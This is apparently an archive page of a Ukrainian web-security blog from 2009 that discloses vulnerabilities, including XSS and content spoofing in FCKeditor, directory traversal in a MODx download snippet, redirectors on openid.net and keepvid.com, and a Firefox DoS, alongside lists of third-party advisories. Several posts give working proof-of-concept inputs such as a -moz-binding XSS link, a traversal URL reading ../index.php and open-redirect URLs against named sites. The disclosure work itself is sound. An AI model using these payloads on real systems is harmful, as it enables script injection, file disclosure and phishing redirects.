Архів для категорії 'Уразливості'

Уразливість на cbse.com.ua

23:56 19.09.2009

У січні, 24.01.2009, я знайшов Cross-Site Scripting уразливість на http://cbse.com.ua - сайті виставок CBSE та CARDEX & IT SECURITY. Про що найближчим часом сповіщу адміністрацію сайта.

XSS:

Уразливість спрацьовує при кліку на лінці “print version”. Це Strictly social XSS.

XSS та Content Spoofing уразливості в FCKeditor

19:21 19.09.2009

07.07.2009

У червні, 23.06.2009, я знайшов Cross-Site Scripting та Content Spoofing уразливості в FCKeditor. Про що найближчим часом повідомлю розробникам редактора.

Раніше я вже писав про уразливості в FCKeditor.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатка.

19.09.2009

XSS:

В FCKEditor є Persistent XSS уразливість, що дозволяє розміщувати XSS код на сайтах, які його використовуть. Атака (в Mozilla і Firefox) відбувається через розміщення лінки з вказанням стилю:

<a href="http://test" style="-moz-binding:url('http://site/xss.xml#xss')">test</a>

Content Spoofing:

Це Persistent Content Spoofing уразливість.

<a href="http://websecurity.com.ua" style="width:100%;height:100%;display:block;position:absolute;top:0px;left:0px">&nbsp;</a>

Дані уразливості в самому редакторі, а не в аплоадері, як більшість уразливостей, про які я писав раніше. Тому їх можна використати на будь-якому сайті, що використовує FCKeditor в якості редактора для веб форм.

Уразливі FCKeditor 2.6.4 та попередні версії.

Уразливості в FileDownload Snippet для MODx

23:51 18.09.2009

У січні, 16.01.2009, я знайшов Directory Traversal та Full path disclosure уразливості в FileDownload Snippet для MODx (популярної CMF і CMS). Уразливості виявив на офіційному сайті системи http://modxcms.com. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливість в MODx CMS.

Directory Traversal:

http://site/assets/snippets/filedownload/download.php?path=YnVpbGRz&fileName=../index.php

Дана уразливість може використовуватися для Arbitrary File Disclosure атаки. Можна викачати будь-які файли з сервера, окрім тих, що містять в шляху та імені рядки “manager” і “config.inc.php”.

Full path disclosure:

http://site/assets/snippets/filedownload/download.php?path=YnVpbGRz&fileName=1

Як я пізніше дізнався на secunia.com, раніше в 2007 році вже була виявлена подібна уразливість в даному веб додатку - FileDownload Snippet for MODx “download.php” Arbitrary File Download. Але розробники зробили вигляд, що виправили її. Але насправді вони виправили уразливість погано - лише заборонили рядки “manager” та “config.inc.php” в шляху та імені файла, але можливість Directory Traversal залишилася.

Добірка уразливостей

16:29 18.09.2009

В даній добірці уразливості в веб додатках:

  • New lighttpd packages fix various problems (деталі)
  • DriveCMS article.php remote sql injection (деталі)
  • Enthusiast 3 Remote Code Execution (деталі)
  • Metrica Service Assurance Multiple Cross Site Scripting (деталі)
  • Multiple remote vulnerabilities MoinMoin v1.80 (деталі)
  • Cross-site scripting (XSS) vulnerability in Gallery (деталі)
  • Directory traversal vulnerability in Gallery (деталі)
  • Information disclosure in Gallery (деталі)
  • Directory traversal vulnerability in Gallery (деталі)
  • HP Insight Diagnostics, Remote Unauthorized Access to Files (деталі)

Уразливості на openid.net

23:54 16.09.2009

Ще 07.11.2007 я знайшов Redirector та Full path disclosure уразливості на секюріті сайті http://openid.net. Також тоді я знайшов й інші уразливості, зокрема Directory Indexing, але зараз вони вже виправлені (окрім цих двох). Про що найближчим часом сповіщу адміністрацію сайта.

Redirector:

http://openid.net/redirect.php?site=websecurity.com.ua

Full path disclosure:

http://openid.net/redirect.php?site=%0A1

Добірка уразливостей

16:25 16.09.2009

В даній добірці уразливості в веб додатках:

  • HP Select Identity Active Directory Bidirectional LDAP Connector, Remote Unauthorized Access (деталі)
  • Typo <= 5.1.3 Multiple Vulnerabilities (деталі)
  • sharedlog CMS Remote File Includes (деталі)
  • Iltaweb Kolay Site (urundetay) Sql injection Vulnerability (Tr) (деталі)
  • Aruba Mobility Controller TACACS User Authentication and Cross Site Scripting Vulnerabilities (деталі)
  • Gangstaz Koy Portal Sql Injection Vulnerability (Tr) (деталі)
  • Remote access vulnerability using BigDump ver. 0.29b (деталі)
  • Arab Portal v2.1 Remote File Disclosure (Win32) (деталі)
  • hMAilServer 4.4.2 (PHPWebAdmin) local & remote file inclusion (деталі)
  • FirmChannel Digital Signage 3.24 Cross-site scripting (деталі)

Уразливості на keepvid.com

19:28 15.09.2009

22.06.2009

У вересні, 21.09.2008, я знайшов Abuse of Functionality, Insufficient Anti-automation та Redirector уразливості на сайті http://keepvid.com. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше.

15.09.2009

Abuse of Functionality:

http://keepvid.com/?url=http%3A%2F%2Fsite

Даний функціонал сайта може використовуватися для проведення CSRF атак на інші сайти.

Insufficient Anti-automation:

http://keepvid.com/?url=http%3A%2F%2Fsite

На даній сторінці відсутній захист від автоматизованих запитів (капча).

Redirector:

http://keepvid.com/save-video.flv?http://websecurity.com.ua

Дані уразливості досі не виправлені.

DoS уразливість в Mozilla Firefox

23:53 14.09.2009

У вересні, 12.09.2009, я знайшов Denial of Service уразливість в браузері Mozilla Firefox. Атака базується на ідеї використання pkcs11.addmodule від Dan Kaminsky.

Атака відноситься до типу блокуючих DoS.

DoS:

Firefox DoS Exploit2.html

При запуску експлоіта Firefox блокується.

Уразливі всі версії Mozilla та Mozilla Firefox 3.0.13 та попередні версії.

Добірка уразливостей

16:08 14.09.2009

В даній добірці уразливості в веб додатках:

  • Java Web start vulnerability (деталі)
  • Sun Java Web Start vm args Stack Buffer Overflow (деталі)
  • Sun Java Web Start Sandbox Bypass Vulnerability (деталі)
  • PHP-Nuke Module Current_Issue (summary&id) Remote SQL injection Vulnerability (деталі)
  • harlandscripts Mypage.php Sql Injection (деталі)
  • spitfirephoto Pro pages.php Sql Injection (деталі)
  • phpWebSite links.php Sql Injection (деталі)
  • U-Mail Webmail ‘edit.php’ Arbitrary File Write Vulnerability (деталі)
  • Cpanel 11.x Local File Inclusion & Cross Site Scripting (деталі)
  • Interact SQL Injection and Cross-Site Request Forgery (деталі)

Уразливості в FCKeditor

19:24 12.09.2009

04.07.2009

У січні, 01.01.2009, я знайшов Directory Traversal та Cross-Site Scripting уразливості в FCKeditor. Directory Traversal в старих версіях, а XSS в усіх версіях даного html текстового редактора. Про що найближчим часом повідомлю розробникам редактора.

Раніше я вже писав про уразливості в FCKeditor.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатка.

12.09.2009

Directory Traversal:

Як я знаю ще з 25.02.2006 з опису уразливостей в FCKeditor, в його старих версіях була дірка, що дозволяла переглянути зміст довільних папок та створювати нові папки в довільних місцях. І все.

Але 01.01.2009 я знайшов, що також можливо завантажувати файли в довільні місця. Якщо в test.html або конекторі в полі Current Folder ввести “../” то відбудеться Directory Traversal атака.

Можна переглядати зміст довільних директорій, створювати нові каталоги в довільних директоріях та завантажувати файли в довільні директорії.

Уразливі FCKeditor 2.0 FC та попередні версії (старі версії FCKeditor).

XSS:

В усіх версіях FCKeditor можна завантажувати swf-файли. Тому можна провести XSS атаку через флеш. Це persistent XSS.

Уразливі FCKeditor 2.6.3 (та 2.6.4 має бути також) та попередні версії.